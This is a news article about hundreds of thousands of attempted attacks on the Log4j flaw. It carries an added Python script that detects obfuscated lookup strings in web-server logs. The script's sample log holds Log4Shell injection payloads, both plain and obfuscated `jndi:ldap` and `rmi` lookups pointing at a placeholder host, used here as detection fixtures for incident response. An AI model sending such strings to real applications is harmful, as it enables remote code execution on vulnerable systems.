
Researchers detect hundreds of thousands of Log4j cyberattack attempts

source link: https://siliconangle.com/2021/12/13/researchers-detect-hundreds-thousands-log4j-cyberattack-attempts/


Researchers at two cybersecurity companies have detected hundreds of thousands of attempts to launch cyberattacks using the recently disclosed vulnerability in Log4j. 

The number of hacking attempts is particularly alarming because the vulnerability was only discovered last Thursday. 

Check Point Software Technologies Ltd., a publicly traded cybersecurity provider, said it has blocked more than 800,000 Log4j-related breach attempts. Sophos Group PLC, in turn, has detected “hundreds of thousands” of cyberattacks, the breach prevention giant disclosed on Sunday.

Log4j is a popular open-source tool for collecting diagnostics data from applications written in the Java programming language. On Thursday, it was revealed that a critical security flaw in Log4j can be used by hackers to breach vulnerable systems. Check Point Software has called the flaw “one of the most serious vulnerabilities on the internet in recent years.”

There are several reasons why the vulnerability is so severe. One is the fact that Log4j is widely used in enterprise applications: The tool has been downloaded more than 400,000 times from GitHub to date. Moreover, Log4j is included in many popular open-source frameworks as a built-in component. Apple Inc. and Microsoft Corp. are among the major companies known to use Log4j in some of their systems.

Another reason why the vulnerability represents a major cybersecurity risk is that it’s relatively easy for hackers to exploit. According to Microsoft researchers, hackers can activate the vulnerability by sending a malicious string, or series of characters, to a vulnerable application.

Logging tools such as Log4j are frequently deployed in such a way that they ingest some of the data processed by the workload to which they’re added. For example, Log4j might ingest some of the passwords that users type into an application’s login form. According to Microsoft, that means hackers can in theory compromise a vulnerable application simply by entering a malicious string into its login form or another part of the interface.

“Successful exploitation allows for arbitrary code execution in the targeted application,” Microsoft researchers explained in a blog post. “Attackers do not need prior access to the system to log the string and can remotely cause the logging event by using commands like curl against a target system to log the malicious string in the application log.”

“It is also likely that internal vulnerable systems may be targeted with post-compromise activity for lateral movement within the affected enterprise,” explained researchers from Cisco Systems Inc.’s Talos cybersecurity unit. Lateral movement is the term for cyberattacks that use a compromised device or application to infect other systems in the same network. 

According to Check Point Software, more than 60 versions of the original exploit emerged within 24 hours of its publication. Microsoft researchers have also determined that hackers are using multiple tactics to target vulnerable systems.
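The article describes the attack as a "malicious string" that only has to reach a log statement, and notes that dozens of variants appeared within a day. The public advisory for the flaw identifies that string as a Log4j lookup of the form `${jndi:...}`, and the variants mostly wrap it in nested `${lower:...}`, `${upper:...}` and `${...:-default}` lookups so naive substring matches miss it; that mechanism is my addition from the advisory, not something the article states. The script below is an added defender-side example, not code from the article, SiliconANGLE or any of the vendors named: it collapses those nested lookups from the inside out and then triages constructed web-server log lines (all hosts use the reserved `example.invalid` domain; the function names are my own) so an incident responder can search existing logs for attempts, including obfuscated ones, without executing any lookup.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample access-log lines (not from the article). Lines 2-4 carry the
# lookup string in the User-Agent field, line 3 and 4 in obfuscated form; line 5
# carries a non-JNDI lookup that should be reported at lower severity.
SAMPLE_LOG = """\
10.0.0.5 - - [13/Dec/2021:10:01:02 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [13/Dec/2021:10:01:09 +0000] "GET / HTTP/1.1" 200 1024 "-" "${jndi:ldap://example.invalid/a}"
10.0.0.9 - - [13/Dec/2021:10:02:31 +0000] "POST /login HTTP/1.1" 401 77 "-" "${${lower:j}ndi:${lower:l}dap://example.invalid/b}"
10.0.0.9 - - [13/Dec/2021:10:02:45 +0000] "POST /login HTTP/1.1" 401 77 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://example.invalid/c}"
10.0.0.11 - - [13/Dec/2021:10:03:00 +0000] "GET /api/prices?q=${env:HOME} HTTP/1.1" 200 88 "-" "curl/7.79.1"
"""

# Innermost ${...}: a lookup whose body contains no further '$', '{' or '}'.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(body: str) -> Optional[str]:
    """Statically evaluate the lookup forms that need no runtime data.

    Returns None for anything that cannot be resolved offline (env, sys, jndi, ...),
    so those lookups are left in place and surface in the verdict instead.
    """
    if body.lower().startswith("jndi:"):
        return None
    if body.startswith("lower:"):
        return body[len("lower:"):].lower()
    if body.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:  # ${name:-default}; ${::-x} (empty name, default x) is a common wrapper
        return body.split(":-", 1)[1]
    return None


def normalize_lookups(text: str, max_rounds: int = 50) -> str:
    """Collapse nested case/default lookups from the inside out until nothing changes."""
    def repl(m: "re.Match[str]") -> str:
        resolved = _resolve(m.group(1))
        return m.group(0) if resolved is None else resolved

    for _ in range(max_rounds):  # bounded so a pathological line cannot spin forever
        new = _INNERMOST.sub(repl, text)
        if new == text:
            break
        text = new
    return text


def classify(line: str) -> str:
    """Verdict for one log line: 'jndi_lookup', 'other_lookup' or 'clean'."""
    norm = normalize_lookups(line)
    if _JNDI.search(norm):
        return "jndi_lookup"
    if "${" in norm:
        return "other_lookup"
    return "clean"


def triage(log_text: str) -> List[Tuple[int, str, str]]:
    """Return (line number, verdict, normalized line) for every non-clean line."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        verdict = classify(line)
        if verdict != "clean":
            findings.append((lineno, verdict, normalize_lookups(line)))
    return findings


if __name__ == "__main__":
    for lineno, verdict, norm in triage(SAMPLE_LOG):
        print(f"line {lineno}: {verdict}\n    {norm}")
```

Run it against a real access log by replacing `SAMPLE_LOG` with the file contents; the normalized column shows reviewers what the string would have become at evaluation time, which is what they need for correlating with outbound connection logs. The script never resolves `env`, `sys` or `jndi` lookups, so it is safe to run on untrusted input.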

The Apache Software Foundation, which is responsible for the development of Log4j, has released a patch that fixes the vulnerability. The open-source group also published a guide on how administrators can block hacking attempts if downloading the patch is not possible.

A number of cybersecurity providers, including Sophos, Check Point Software, Cloudflare Inc. and others, have taken steps to protect customers whose infrastructure may contain vulnerable Log4j deployments. 

Image: Unsplash

